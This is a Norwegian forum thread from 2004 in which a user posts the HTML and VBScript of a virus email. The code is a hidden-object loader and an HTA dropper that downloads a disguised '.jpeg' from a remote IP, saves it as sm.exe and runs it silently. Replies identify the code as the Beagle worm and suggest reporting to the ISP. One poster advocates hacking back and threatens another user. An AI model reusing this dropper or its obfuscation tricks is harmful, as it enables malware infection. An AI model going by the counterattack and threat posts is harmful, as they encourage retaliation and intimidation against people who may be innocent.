inaktiv000 Skrevet 18. mars 2004 Rapporter Del Skrevet 18. mars 2004 Hei, i det siste har jeg mottatt svært mange mail med virus. Vanligvis sletter jeg dem med en gang, men nå fikk jeg et fra [email protected]. Den hadde ingen attachment, så jeg kikket litt for å finne ut hva det var for noe. I mailen ligger følgende innhold: <html><body><font face="System"> <OBJECT STYLE="display:none" DATA="http://68.66.185.120:81/330282.php"> </OBJECT></body></html> Det er altså en IP adresse som enkelt bør kunne spores. PHP scriptet returnerer dette: <HTML><HEAD> <TITLE>Windows Update</TITLE> <HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none" BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/> <script LANGUAGE="VBScript"> MyFile = "q.vbs" drte52f = "ileSyst" Set FSO = CreateObject("Scripting.F"+drte52f+"emObject") Set TSO = FSO.CreateTextFile(MyFile, True) TSO.write "Dim BD" & vbcrlf TSO.write "Dim xml" & vbcrlf TSO.write "f5j545i = ""MLH""" & vbcrlf TSO.write "Set xml = CreateObject(""Microsoft.X""+f5j545i+""TTP"")" & vbcrlf TSO.write "xml.Open ""GET"", ""http://68.66.185.120:81/havrvvr.jpeg"", False" & vbcrlf TSO.write "xml.Send" & vbcrlf TSO.write "C=C=C=C" & vbcrlf TSO.write "BD = xml.ResponseBody" & vbcrlf TSO.write "C=C=C=C" & vbcrlf TSO.write "Const adTypeBinary = 1" & vbcrlf TSO.write "Const adSaveCreateOverWrite = 2" & vbcrlf TSO.write "C=C=C=C" & vbcrlf TSO.write "Dim BinaryStream" & vbcrlf TSO.write "C=C=C=C" & vbcrlf TSO.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf TSO.write "BinaryStream.Type = adTypeBinary" & vbcrlf TSO.write "A=A=A=A" & vbcrlf TSO.write "BinaryStream.Open" & vbcrlf TSO.write "BinaryStream.Write BD" & vbcrlf TSO.write "b=b=b=b" & vbcrlf TSO.write "BinaryStream.SaveToFile ""sm.exe"", adSaveCreateOverWrite" & vbcrlf TSO.write "Dim WshShell" & vbcrlf TSO.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf TSO.write "WshShell.Run ""sm.exe"", 0, false" & vbcrlf TSO.close Set TSO = Nothing Set FSO = Nothing Dim WshShell Set WshShell = CreateObject("WScript.Shell") WshShell.Run "q.vbs", 0, false </SCRIPT> <script>window.close()</script> </HEAD> </HTML> Kan noen hjelpe meg med å spore eieren, og kontakte rette "myndigheter"? Lenke til kommentar
Lurifaksen Skrevet 18. mars 2004 Rapporter Del Skrevet 18. mars 2004 Det har ikke slått deg at den IP adressen er en som er infisert av et virus, og ikke aner at han kjører en webserver? Tror nok det er den mest sannsynlige teorien i slike tilfeller. Lenke til kommentar
Snorre123 Skrevet 18. mars 2004 Rapporter Del Skrevet 18. mars 2004 Addressen du viser til linker til en fil som er virus-infisert. Lenke til kommentar
Hittman Skrevet 18. mars 2004 Rapporter Del Skrevet 18. mars 2004 IP adressen hører hjemme hos Adelphia Cable Communications. Abuse adressen dit er [email protected]. Utover å rapportere det dit er det vel ikke så mye du får gjort. Lenke til kommentar
inaktiv000 Skrevet 18. mars 2004 Forfatter Rapporter Del Skrevet 18. mars 2004 GeeZuZz: det innebærer i så fall at viruset har installert en php server (antakeligvis), virker ikke det litt merkelig? For meg ser det ut som noen har satt opp en webserver som en del av viruset. Lenke til kommentar
Kjetil Lura Skrevet 18. mars 2004 Rapporter Del Skrevet 18. mars 2004 Vi får vel mange viruser alle sammen tenker eg, norton kommer stadig opp med at virus funnet i ett vedlegg når eg leser mailen min. Er blitt en del i det siste. Lenke til kommentar
Shiva Skrevet 18. mars 2004 Rapporter Del Skrevet 18. mars 2004 Sjekk om det er åpne porter på den ip'en så sender du noe dritt tilbake. Lenke til kommentar
Lurifaksen Skrevet 18. mars 2004 Rapporter Del Skrevet 18. mars 2004 GeeZuZz: det innebærer i så fall at viruset har installert en php server (antakeligvis), virker ikke det litt merkelig? For meg ser det ut som noen har satt opp en webserver som en del av viruset. Jo, det er litt merkelig, men tror nok det skal gå an. En veldig simpel webserver, med en veldig simpel script parser. Trenger ikke nødvendigvis å være standard php. Lenke til kommentar
Bytex Skrevet 19. mars 2004 Rapporter Del Skrevet 19. mars 2004 Gutten, la meg si det sånn: Hvis det hadde vært så LETT å spore viruset tilbake til skaperen bare ved å spore IP-adressa i From: feltet på en hvilken som helst mottatt virusmail, hadde ikke Microsoft satt ut $100,000 (hundretusen dollar ja) i belønning for å ta karen som lagde Blaster-ormen. Det eneste du finner er serveren viruset ble videresendt gjennom sist desverre. Lenke til kommentar
inaktiv000 Skrevet 19. mars 2004 Forfatter Rapporter Del Skrevet 19. mars 2004 Andre gutten, det var ikke noen IP adresse i header felt jeg la ut. Hvis du leser det jeg skrev, ser du at mailen inneholdt HTML kode som sender mottakeren videre til http://68.66.185.120:81/330282.php. I denne filen ligger viruset. Lenke til kommentar
Mr.Elendig Skrevet 19. mars 2004 Rapporter Del Skrevet 19. mars 2004 @cecolon Du kunne ha satt tag på den linken.......... Send ein mail til [email protected]. Det er ikkje så mykje anna du kan gjøre. (eventuelt ein liten mail til norton og..) Lenke til kommentar
Micromus Skrevet 19. mars 2004 Rapporter Del Skrevet 19. mars 2004 Ut fra mine skrale kunnskaper ser det ut som om den angivelige .php filen inneholder en form for Buffer Overflow exploit ( den som ble oppdaget i Win2000 Kildekoden? ), det trenger heller ikke kjøre noen form for webserver i det heletatt, det skal ikke mere til en et script som sender $virus til enhver som connecter til en port. Men, hvordan det faktisk fungerer finner vi nok aldri ut, ikke fordi det ikke er mulig, men det drukner i mengden av andre virus Lenke til kommentar
reybr Skrevet 19. mars 2004 Rapporter Del Skrevet 19. mars 2004 (endret) Beagle viruset igjen (Vet ikke hvilken versjon. Det er enten o, r, s eller t. LEs mer på symantec.com) og du har blitt infisert :-) (Kommer litt ann på security innstillingene på maskinen din og hvilket mailprogram du bruker) Aller først: Viruset ligger ikke i PHP filen. PHP filen laster ned filen sm.exe til maskinen din uten at du får opp noe spørsmål om du vil laste ned filen. Det er dette som er viruset. TSO.write "BinaryStream.SaveToFile ""sm.exe"", adSaveCreateOverWrite" & vbcrlf Etter at viruset er lastet ned blir viruset, naturlig nok, kjørt TSO.write "WshShell.Run ""sm.exe"", 0, false" & vbcrlf IP adressen du kobler deg til er allerede kjent for antivirusselskapene, så hvorfor ISPen ikke har stengt denne IPen allerede vet jeg ikke, men det jobbes nok med det. Endret 19. mars 2004 av reybr Lenke til kommentar
inaktiv000 Skrevet 19. mars 2004 Forfatter Rapporter Del Skrevet 19. mars 2004 Jeg er klar over at php scriptet ikke er virusfilen, men at det sannsynligvis ligger i .exe filen (og jpeg filen). Hvorfor mener du at jeg er infisert? Godt det var noen andre som var enige i at den IPen er slem (hvis jeg tolket deg rett) Lenke til kommentar
reybr Skrevet 19. mars 2004 Rapporter Del Skrevet 19. mars 2004 Jeg er klar over at php scriptet ikke er virusfilen, men at det sannsynligvis ligger i .exe filen (og jpeg filen). Hvorfor mener du at jeg er infisert? Godt det var noen andre som var enige i at den IPen er slem (hvis jeg tolket deg rett) Ettersom du har åpnet php siden, så har vel kanskje også sciptet som ligger i denne blitt utført. Og da er du blitt infisert. Men jeg vet jo ikke hvordan du har gått frem for å få kildekoden php siden genererte, så jeg kan jo ikke være sikker. Ville uansett skannet igjennom maskinen for å være sikker. IP adressen er nok "slem" ja, men det kan likelve hende at den er på en maskin hvor eier ikke aner noenting. (Det er ihvertfall det mest sannsynlige). Regner uansett med at ISPen er varslet ettersom Symantec har offentliggjordt IP adressen Lenke til kommentar
Shiva Skrevet 26. mars 2004 Rapporter Del Skrevet 26. mars 2004 (endret) En her har tatt utfordringen og sender meg daglig virus i mail, uten suksess såklart. Jeg har to hovedmål med mitt system, det første sikkerhet mot alt som kommer inn av potesnsielt angrep på maskinen, det med hensikt at jeg senere skal kjøre server som skal være mest mulig sikker for brukerne. En ide til system er også at istedenfor for at maskinen bare beskytter seg mot angrep skal den også legges opp slik at den er aggressiv og kjører motangrep. Så du har et kombinert forsvar og angrep. Tabben du gjorde var å sende fra denne adressen: fjernet Som jeg skrev til deg i privat kjører jeg agressivt motangrep så snart jeg har dine personopplysninger. Ikke send trojaner fra jobben din sin pc, som også er online og har åpne porter. Bare så du er obs på det bruker ikke nettverket proxy. Vil være til fordel for meg og ulempe for deg når det kommer. Endret 26. mars 2004 av Shiva Lenke til kommentar
BennyXNO Skrevet 26. mars 2004 Rapporter Del Skrevet 26. mars 2004 En ide til system er også at istedenfor for at maskinen bare beskytter seg mot angrep skal den også legges opp slik at den er aggressiv og kjører motangrep. Så du har et kombinert forsvar og angrep. Tabben du gjorde var å sende fra denne adressen:[email protected] Hvordan i all verden vet du at en person her inne har aktivt sendt deg et virus. Med så mange viruser som går ut der ute og faker e-post-adresser, er det jo håpløst å finne ut hvem som egentlig sendte mailen. Jada, jeg vet at det går til en viss grad an å vise hvilken maskin som har sendt ut mailen, men det er fortsatt ikke ensbetydende med at det er eieren av denne maskinen som aktivt har prøvd å sende deg virus. En annen sak er jo at man ikke skal spamme virus-avsender eller angripe denne aktivt da han i mange tilfeller er totalt uskyldig (Selv om han i mange tilfeller er dum, uvitende eller begge deler) Lenke til kommentar
Shiva Skrevet 26. mars 2004 Rapporter Del Skrevet 26. mars 2004 Det er jeg fullstendig klar over og slikt bryr jeg meg ikke om. Akkurat denne her sender det manuelt. Rett etter han leste innlegget mitt på overklokking.no senest i dag prøvde han seg igjen. Var en grunn til at jeg formulerte innlegget på den måten også som en del av taktikken. Jeg skulle bare sette ham i en felle og sanke et klokkeslett slik at de opplysningene jeg har om han kunne kunne verifiseres, og andre kandidater kunne lukes bort. Så tenker han at han skal sende meg en ny trojaner rett etter å ha lest, men hva glemmer han? jo, han glemmer som jeg forutså å bytte ip. Dette er ikke en tilfeldig e-mail som dukker opp nå og da. Dette er et personlig agenda han har valgt å kjøre for han har også gjort andre ting enn å sende meg trojaner. Jeg vet du leser dette her for nicket ditt er i denne tråden. Hvordan jeg greide å spore det opp til at du startet det fra overklokking.no var enkelt. Når jeg lurte deg til å klikke på feil domene la du igjen ip i log'en. Du kan også være sikker på at jeg ikke har sendt en klage til teleselskapet ditt om dine aktiviteter på nettet. Noe du herved skal tolke som en direkte fysisk trussel. Til dere andre uinvidde her. Jeg kunne godt sagt hvem det er og hva han har gjort mer detaljert utenom å sende trojaner, men det ligger i mitt esskort å ikke gjøre det hvis han velger å forsette. Mer skriver jeg ikke om denne saken. Lenke til kommentar
Alastor Skrevet 26. mars 2004 Rapporter Del Skrevet 26. mars 2004 Jeg ser egentlig ikke helt poenget med å legge ut en adresse med en virusinnstallerende exploit i. FJERN TAKK! Lenke til kommentar
Shiva Skrevet 26. mars 2004 Rapporter Del Skrevet 26. mars 2004 (endret) Mer info om en ukes tid. Skal jeg fortelle en liten historie. Her er to linker med litt lesestoff. http://lists.gpick.com/portlist/portlist.htm http://www.iana.org/assignments/port-numbers Endret 26. mars 2004 av Shiva Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå